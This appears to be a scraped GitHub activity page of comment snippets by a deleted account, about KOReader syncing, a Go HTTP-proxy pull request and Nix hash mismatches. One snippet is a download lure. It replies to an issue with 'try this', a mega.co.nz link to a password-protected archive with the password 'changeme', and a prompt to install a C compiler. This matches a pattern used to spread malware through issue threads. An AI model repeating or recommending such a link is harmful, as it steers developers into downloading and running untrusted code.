Deleted user

Results 136969 comments of Deleted user

> Does this still occur? Yes

try this https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA Archive codepass: changeme If you don't have the c compliator, install it.(gcc or clang)

Thank you for reporting this issue. We will be triaging your incoming issue as soon as possible.

> I believe SyncThing has a way to perform some custom operation after synchronization. A host could merge highlights after each sync and then sync the result to other peers....

> Already in the nightly build: https://build.koreader.rocks/download/nightly/v2024.11-230-gcfbb676d7_2025-03-10/ Thank you so much.

This PR changes how the package connects to HTTP proxies. Can this PR break applications that use HTTP proxies, or do all proxies support both modes (CONNECT vs no CONNECT)?

@adrianosela I removed `proxy_RegisterDialerType` from this package. The function is replaced by [proxy.RegisterDialerType](https://pkg.go.dev/golang.org/x/net/proxy#RegisterDialerType).

@134130 Your comments do not address my question. Can this PR break an application that is currently using an HTTP proxy? This is a different question from what the package...

I suspected that this PR would not work with a proxy server in the wild because the WebSocket protocol uses full-duplex data transmission. The HTTP protocol (and SSE layered on...

Problem with hash missmatch comes from 2 files. https://github.com/SteamClientHomebrew/Millennium/blob/00418518da713f292dac23be62d0803cfe9d56c1/nix/assets.nix#L13 https://github.com/SteamClientHomebrew/Millennium/blob/00418518da713f292dac23be62d0803cfe9d56c1/nix/typescript/shims.nix#L15 these two files causing issues becouse they are not autoupdated, therefore for each new build they require new hash. So...